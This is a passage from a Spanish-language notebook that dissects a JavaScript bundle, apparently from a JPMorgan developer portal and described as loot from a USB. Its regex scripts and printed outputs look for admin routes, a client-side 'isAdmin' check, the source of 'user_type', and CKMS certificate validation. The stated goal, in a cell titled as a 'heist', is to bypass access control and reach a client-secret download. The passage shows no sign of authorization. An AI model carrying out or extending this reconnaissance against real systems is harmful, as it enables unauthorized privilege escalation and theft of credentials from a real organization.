        print(f"🔥 [!] OBJETO DE IDENTIDAD LOCALIZADO:")
        print(match.group(1))

        # 2. Análisis de privilegios
        if "admin" in match.group(1).lower():
            print("✅ ALERTA: La sesión actual tiene privilegios de ADMIN.")
    else:
        print("⚠️ USER_DETAILS no está hardcodeado. Se carga vía AJAX.")
        # Buscamos la llamada que lo carga
        print("🔎 Buscando la fuente del perfil...")
        source = re.findall(r"url:\s*['\"](/api/v0/users/.*?)['\"]", raw_js)
        if source:
            print(f"📍 Fuente detectada: {source[0]}")

# Ejecución sobre los 1.2MB del USB
harvest_user_identity(kaoru_exp.raw_content)

🕵️ [FASE 7.5] EXTRRAYENDO EL OBJETO 'USER_DETAILS'...
-----------------------------------------------------------------
⚠️ USER_DETAILS no está hardcodeado. Se carga vía AJAX.
🔎 Buscando la fuente del perfil...
📍 Fuente detectada: /api/v0/users/onboardings/


In [25]:
import re

def analyze_onboarding_logic(raw_js):
    print(f"🕵️ [FASE 7.6] ANALIZANDO EL PROCESADOR DE ONBOARDING...")
    print("-" * 65)

    # Buscamos el éxito (success) de la llamada a /users/onboardings/
    # Queremos ver qué variables se llenan con la respuesta 'data'
    logic_pattern = r"\/users\/onboardings\/[\s\S]*?success\s*:\s*function\s*\(data\)\s*\{([\s\S]{1,600})\}"
    match = re.search(logic_pattern, raw_js)

    if match:
        print(f"🔥 [!] PROCESADOR DETECTADO:")
        logic_content = match.group(1)
        print(logic_content)

        # Buscamos si guarda algo en localStorage o Cookies
        if "localStorage" in logic_content:
            print("\n💡 PISTA: El sistema guarda persistencia en localStorage.")
        if "setCookie" in logic_content or "cookie" in logic_content.lower():
            print("\n💡 PISTA: El sistema genera una cookie de sesión local.")
    else:
        print("⚠️ No se encontró un manejador directo. Podría usar Promesas (then).")
        # Buscamos con el patrón de promesas
        promise_pattern = r"\/users\/onboardings\/[\s\S]*?\.then\s*\(.*?=>\s*\{([\s\S]{1,600})\}"
        match_p = re.search(promise_pattern, raw_js)
        if match_p:
            print(f"🔥 [!] PROCESADOR (PROMISE) DETECTADO:")
            print(match_p.group(1))

# Ejecución sobre el bundle
analyze_onboarding_logic(kaoru_exp.raw_content)

🕵️ [FASE 7.6] ANALIZANDO EL PROCESADOR DE ONBOARDING...
-----------------------------------------------------------------
🔥 [!] PROCESADOR DETECTADO:

                DIALOGS.alert("Request Access", "Access request was successfully submitted.", "complete");
            },
            error: function () {
                DIALOGS.alert("Request Access", "There was an error when submitting this access request. Please try later.", "error");
            }
        });

        // record the metric...
        METRICS.sendMetric('OnboardingRequest', request['id'], 'jpmdeveloper.detail_page');
    }
};
var DEVELOPER = {
    isDirectNavigationHandled: false,
    scrollIds: {},
    observingMutations: false,
    navigated: false,
    sectionMapping: {


In [26]:
import re

def expose_hidden_sections(raw_js):
    print(f"🕵️ [FASE 7.7] REVELANDO EL MAPA OCULTO DE 'DEVELOPER'...")
    print("-" * 65)

    # 1. Extraemos el mapeo de secciones para encontrar rutas admin
    section_pattern = r"sectionMapping\s*:\s*\{([\s\S]{1,1000})\}"
    match = re.search(section_pattern, raw_js)

    if match:
        print(f"🔥 [!] MAPA DE NAVEGACIÓN INTERNA DETECTADO:")
        mapping = match.group(1)
        print(mapping)

        # Buscamos palabras clave de alto nivel
        keywords = ['admin', 'secret', 'token', 'internal', 'config', 'debug']
        for key in keywords:
            if key in mapping.lower():
                print(f"   >>> 🎯 RUTA CRÍTICA LOCALIZADA: {key}")

    # 2. Buscamos el bypass del booleano de navegación
    print("\n🛠️ ANALIZANDO BYPASS DE NAVEGACIÓN DIRECTA...")
    if "isDirectNavigationHandled" in raw_js:
        print("✅ CONFIRMADO: El objeto DEVELOPER permite el control de flujo manual.")

# Ejecución sobre el bundle del USB
expose_hidden_sections(kaoru_exp.raw_content)

🕵️ [FASE 7.7] REVELANDO EL MAPA OCULTO DE 'DEVELOPER'...
-----------------------------------------------------------------

🛠️ ANALIZANDO BYPASS DE NAVEGACIÓN DIRECTA...
✅ CONFIRMADO: El objeto DEVELOPER permite el control de flujo manual.


In [27]:
import re

def final_section_jump(raw_js):
    print(f"🕵️ [FASE 7.8] EXTRRAYENDO COORDENADAS DE SALTO...")
    print("-" * 65)

    # Buscamos el mapeo de secciones dentro del objeto DEVELOPER
    # Buscamos patrones como: 'dashboard': 'dashboard.js', 'admin': 'admin_tools'
    mapping_pattern = r"sectionMapping\s*:\s*\{([\s\S]{1,1500})\}"
    match = re.search(mapping_pattern, raw_js)

    if match:
        raw_mapping = match.group(1)
        # Extraemos pares clave-valor del mapeo
        sections = re.findall(r"['\"]?([a-zA-Z0-9_/]+)['\"]?\s*:\s*['\"]?([a-zA-Z0-9_/.]+)['\"]?", raw_mapping)

        print(f"🔥 [!] RUTAS DE NAVEGACIÓN ENCONTRADAS EN EL ADN:")
        for route, target in sections:
            status = "🔓 ACCESIBLE"
            if any(k in route.lower() for k in ['admin', 'internal', 'tool', 'publish']):
                status = "🚨 CRÍTICA (TARGET)"
            print(f"   >>> {route.ljust(20)} -> {target.ljust(25)} [{status}]")
    else:
        print("⚠️ Mapeo no encontrado en formato estándar. Buscando disparadores de 'navigate'...")
        nav_triggers = re.findall(r"navigate\(['\"](.*?)['\"]", raw_js)
        print(f"📍 Disparadores detectados: {list(set(nav_triggers))}")

# Ejecución final sobre el botín del USB
final_section_jump(kaoru_exp.raw_content)

🕵️ [FASE 7.8] EXTRRAYENDO COORDENADAS DE SALTO...
-----------------------------------------------------------------
⚠️ Mapeo no encontrado en formato estándar. Buscando disparadores de 'navigate'...
📍 Disparadores detectados: ['/search', 'products/', 'tools/publishing_tools', '/', 'projects/', '/projects', 'dashboard', '/tools/']


In [28]:
import re

def analyze_publishing_tools(raw_js):
    print(f"🕵️ [FASE 7.9] AUTOPSIA DE 'PUBLISHING_TOOLS'...")
    print("-" * 65)

    # 1. Buscamos la lógica específica de la sección de herramientas
    # Buscamos donde se use la ruta detectada
    tool_logic = re.findall(r"tools/publishing_tools.*?\{([\s\S]{1,1000})\}", raw_js)

    if tool_logic:
        print(f"🔥 [!] LÓGICA DE PUBLICACIÓN LOCALIZADA:")
        # Buscamos llamadas a APIs de "secrets", "keys" o "tokens"
        content = tool_logic[0]
        critical_calls = re.findall(r"\.ajax\(.*?\b(url|data)\b.*?\b(secret|key|token)\b.*?\)", content, re.I | re.S)

        if critical_calls:
            print("🚨 LLAMADA CRÍTICA DETECTADA DENTRO DE LA HERRAMIENTA:")
            print(content[:500] + "...")
        else:
            print("💡 La herramienta carga la lógica dinámicamente. Buscando dependencias...")
            deps = re.findall(r"require\(['\"](.*?)['\"]", content)
            print(f"📦 Dependencias de la herramienta: {deps}")

# Ejecución sobre el bundle
analyze_publishing_tools(kaoru_exp.raw_content)

🕵️ [FASE 7.9] AUTOPSIA DE 'PUBLISHING_TOOLS'...
-----------------------------------------------------------------
🔥 [!] LÓGICA DE PUBLICACIÓN LOCALIZADA:
💡 La herramienta carga la lógica dinámicamente. Buscando dependencias...
📦 Dependencias de la herramienta: []


In [29]:
import re

def find_access_control_variables(raw_js):
    print(f"🕵️ [FASE 8.0] BUSCANDO EL INTERRUPTOR MAESTRO (ADMIN_SWITCH)...")
    print("-" * 65)

    # 1. Buscamos booleanos que controlen el acceso a 'publishing_tools'
    # Buscamos patrones de: if(user.isAdmin), if(canPublish), etc.
    access_patterns = [
        r"if\s*\((.*?isInternal.*?)\)",
        r"if\s*\((.*?isAdmin.*?)\)",
        r"if\s*\((.*?canManage.*?)\)",
        r"showPublishingTools\s*:\s*(.*)"
    ]

    for p in access_patterns:
        matches = re.findall(p, raw_js, re.I)
        if matches:
            print(f"🔥 [!] INTERRUPTOR DETECTADO: {matches}")

    # 2. Buscamos el objeto de configuración de la UI
    # Queremos ver si hay un flag de 'enabled: false' que podamos pasar a 'true'
    ui_config = re.findall(r"publishing_tools.*?enabled\s*:\s*(false|true)", raw_js, re.I)
    if ui_config:
        print(f"🚨 ESTADO DE LA HERRAMIENTA: {ui_config[0]}")

# Ejecución sobre el contenido del USB
find_access_control_variables(kaoru_exp.raw_content)

🕵️ [FASE 8.0] BUSCANDO EL INTERRUPTOR MAESTRO (ADMIN_SWITCH)...
-----------------------------------------------------------------
🔥 [!] INTERRUPTOR DETECTADO: ['isAdmin(', 'isAdmin(']


In [30]:
import re

def dissect_admin_function(raw_js):
    print(f"🕵️ [FASE 8.1] DISECCIONANDO LA FUNCIÓN 'isAdmin()'...")
    print("-" * 65)

    # Buscamos la definición: isAdmin: function() { ... } o function isAdmin() { ... }
    definition_pattern = r"(?:isAdmin\s*:\s*function|function\s+isAdmin)\s*\(.*?\)\s*\{([\s\S]{1,400})\}"
    match = re.search(definition_pattern, raw_js)

    if match:
        print(f"🔥 [!] ADN DEL GUARDIÁN LOCALIZADO:")
        content = match.group(1)
        print(content)

        # Buscamos qué comprueba
        if "role" in content.lower():
            print("\n💡 PISTA: Comprueba un campo 'role' en el perfil del usuario.")
        if "groups" in content.lower():
            print("\n💡 PISTA: Busca pertenencia a grupos de Active Directory (LDAP).")
    else:
        print("⚠️ Definición compleja. Buscando asignaciones directas...")
        # A veces lo hacen así: isAdmin = () => true
        direct_assign = re.findall(r"isAdmin\s*=\s*(.*?);", raw_js)
        if direct_assign:
            print(f"📍 Asignación detectada: {direct_assign[0]}")

# Ejecución sobre el bundle
dissect_admin_function(kaoru_exp.raw_content)

🕵️ [FASE 8.1] DISECCIONANDO LA FUNCIÓN 'isAdmin()'...
-----------------------------------------------------------------
🔥 [!] ADN DEL GUARDIÁN LOCALIZADO:

            return typeof user_type !== 'undefined' && user_type !== 'USER';
        }

// specialized renderers for certain stage types...
        if (stage['type'] === 'certificate') {

            var stage_wrapper = $('<div>', {
                'class': 'main-wrapper'
            });

            var certificate = $('<div>', {
                'class': 'file-drop-area'
            


In [31]:
import re

def locate_user_type_origin(raw_js):
    print(f"🕵️ [FASE 8.2] RASTREANDO EL ORIGEN DE 'user_type'...")
    print("-" * 65)

    # 1. Buscamos dónde se asigna valor a user_type
    assignment_patterns = [
        r"user_type\s*=\s*(.*?);",
        r"['\"]?user_type['\"]?\s*:\s*['\"]?(.*?)['\"]?",
        r"getCookie\(['\"]user_type['\"]\)"
    ]

    for p in assignment_patterns:
        origin = re.findall(p, raw_js)
        if origin:
            print(f"🔥 [!] ORIGEN DETECTADO: {origin}")

    # 2. Buscamos el renderizador de certificados para ver qué 'secretos' pide
    cert_logic = re.findall(r"stage\['type'\]\s*===\s*['\"]certificate['\"][\s\S]{1,500}", raw_js)
    if cert_logic:
        print(f"\n📜 LÓGICA DE CERTIFICADO DETECTADA:")
        print(cert_logic[0].strip()[:300] + "...")

locate_user_type_origin(kaoru_exp.raw_content)

🕵️ [FASE 8.2] RASTREANDO EL ORIGEN DE 'user_type'...
-----------------------------------------------------------------
🔥 [!] ORIGEN DETECTADO: ["'USER'", "'USER'", "($('#projects').length) ? 'ADMIN' : 'USER'"]
🔥 [!] ORIGEN DETECTADO: ['']

📜 LÓGICA DE CERTIFICADO DETECTADA:
stage['type'] === 'certificate') {

            var stage_wrapper = $('<div>', {
                'class': 'main-wrapper'
            });

            var certificate = $('<div>', {
                'class': 'file-drop-area'
            });

            var postSetCb = PROJECTS.CKMS_VALIDATION_ENABLED...


In [32]:
import re

def final_ckms_heist(raw_js):
    print(f"🕵️ [FASE 9.0] PENETRANDO EL NÚCLEO CKMS...")
    print("-" * 65)

    # 1. Buscamos la configuración de CKMS
    ckms_config = re.findall(r"CKMS_VALIDATION_ENABLED\s*:\s*(true|false)", raw_js)
    if ckms_config:
        print(f"🚨 VALIDACIÓN CKMS ACTIVA: {ckms_config[0]}")

    # 2. Buscamos la función que procesa el certificado subido
    # Queremos ver si podemos forzar el callback de 'validado'
    callback_pattern = r"PROJECTS\.CKMS_VALIDATION_ENABLED.*?\{([\s\S]{1,800})\}"
    match = re.search(callback_pattern, raw_js)

    if match:
        print(f"🔥 [!] LÓGICA DE VALIDACIÓN DETECTADA:")
        print(match.group(1).strip()[:400] + "...")

    # 3. Buscamos el comando de 'success' para el certificado
    if "complete" in raw_js.lower() or "validated" in raw_js.lower():
        print("\n✅ PISTA: Existen estados de 'complete' que activan la descarga del Client Secret.")

final_ckms_heist(kaoru_exp.raw_content)

🕵️ [FASE 9.0] PENETRANDO EL NÚCLEO CKMS...
-----------------------------------------------------------------
🚨 VALIDACIÓN CKMS ACTIVA: true

✅ PISTA: Existen estados de 'complete' que activan la descarga del Client Secret.
